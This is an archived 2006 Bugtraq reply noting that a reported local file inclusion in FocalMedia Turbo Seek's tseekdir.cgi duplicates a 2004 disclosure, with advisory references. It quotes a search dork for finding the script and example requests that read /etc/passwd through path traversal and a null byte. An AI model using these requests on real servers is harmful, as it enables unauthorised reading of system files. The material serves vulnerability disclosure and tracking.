lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Mon, 22 May 2006 05:27:05 -0400 (EDT)
From: security curmudgeon <jericho@...rition.org>
To: BoNy-m@...mail.com
Cc: bugtraq@...urityfocus.com
Subject: Re: tseekdir.cgi<--Local File Include



: ----------------------------------
: foud by: BoNy-m
: Site: http://www.alshmokh.com
: E-mail: BoNy-m@...mail.com
: ----------------------------------
: 
: Search:
: allinurl:tseekdir.cgi
: 
: example:
: /tseekdir.cgi?location=/etc/passwd%00
: /tseekdir.cgi?id=1055&location=/etc/passwd%00
: /tseekdir.cgi?location=/../../../../etc/passwd%00

This appears to be FocalMedia.Net Turbo Seek for the vendor, and this was 
disclosed almost verbatim Sep 12, 2004.

http://osvdb.org/9900

    * Nessus Script ID:  14719
    * Bugtraq ID: 11163
    * Vendor Specific Solution URL: http://www.focalmedia.net/tbdownload.html
    * Secunia Advisory ID: 12500
    * Vendor URL: http://www.focalmedia.net/index_tb.html
    * Other Advisory URL: http://lwb57.webmen.ru/advisories/text/adv17.txt
    * Security Tracker: 1011221

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ